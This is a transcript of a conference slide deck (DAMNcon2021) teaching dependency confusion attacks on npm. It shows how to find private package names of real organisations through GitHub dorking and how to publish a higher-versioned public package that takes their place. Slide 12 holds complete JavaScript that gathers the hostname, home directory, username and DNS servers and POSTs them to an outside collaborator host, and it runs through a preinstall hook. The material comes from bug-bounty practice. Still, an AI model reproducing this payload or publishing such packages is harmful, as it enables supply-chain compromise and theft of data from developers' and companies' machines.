Dependency Confusion

Transcript

1. Bug Bounty Hunter and Trainer Red Team Ops @Agri10x Masters

   In Cyber Security @UEA Interested in WebApps, Functional Exploits and Bikes INDIAN WHOAMI ?

2. Dependecy Confusion

3. What is Dependency Confusion ??? A Dependency Confusion attack, also

   known as a supply chain substitution attack, occurs when a software installer script is tricked into downloading a malicious code file from a public repository rather than the intended file of the same name from an internal repository.
4. None

5. Difference ??? 1. As seen in the above image, the

   Public Package contains a higher version than the Private Package. 2. As a result, if the package indexing is not completed properly, it will automatically retrieve the Higher version package from the Public Registry.

6. How to find Private Packages ? Within Organization, use Github

   Dorking with keywords like package.json org:Samsung package.json Use filters like : language:json org:Samsung package.json language:json org:target_org package.json language:json
7. None

8. It can be also found using npm package.json disclosure nuclei

   template.

9. Case Study https://github.com/facebook/flipper/blob/45ce538c8dd6b44 8388a01e2ed4fa398956e5e20/desktop/eslint-plugin- flipper/package.json 1. 2. Package Name: eslint-plugin-flipper

   3. Type: Private wget https://github.com/facebook/flipper/blob/45ce538c8dd6b44 8388a01e2ed4fa398956e5e20/desktop/eslint-plugin- flipper/package.json

10. We have to check if private package exist or not

    We have to check on offcial website : https://www.npmjs.com/

11. Install NPM using the following command Creating Malicious Packages (NPM)

    apt install npm npm login npm init : Create package 1. 2. 3.

12. After successful creation of the package.json file , we need

    to edit the created file to execute our own scripts and command. Index.js const os = require("os");const dns = require("dns");const querystring = require("querystring");const https = require("https");const packageJSON = require("./package.json");const package = packageJSON.name;const trackingData = JSON.stringify({p: package,c: __dirname,hd: os.homedir(),hn: os.hostname(),un: os.userInfo().username,dns: dns.getServers(),r: packageJSON ? packageJSON.___resolved : undefined,v: packageJSON.version,pjson: packageJSON,});var postData = querystring.stringify({msg: trackingData,});var options = {hostname: "burpcollaborator.net", //replace burpcollaborator.net with Interactsh or pipedreamport: 443,path: "/",method: "POST",headers: {"Content-Type": "application/x-www-form-urlencoded","Content-Length": postData.length,},};var req = https.request(options, (res) => {res.on("data", (d) => {process.stdout.write(d);});});req.on("error", (e) => {// console.error(e);});req.write(postData);req.end();

13. Now there will be two files created package.json , index.js.

    Before publishing the package to public registry make sure this package name Doesn’t exist in the Public Registry. Use the following command to publish the package. Pushing into Public Registry (NPM)
14. None

15. The Published package contains Higher Version compared to the original

    one.

16. packages, our package.json file preinstall scripts will execute the index.js

    file and obtain the hostname, directory, IP address, and username as shown below.

17. Thank you guys DAMNcon2021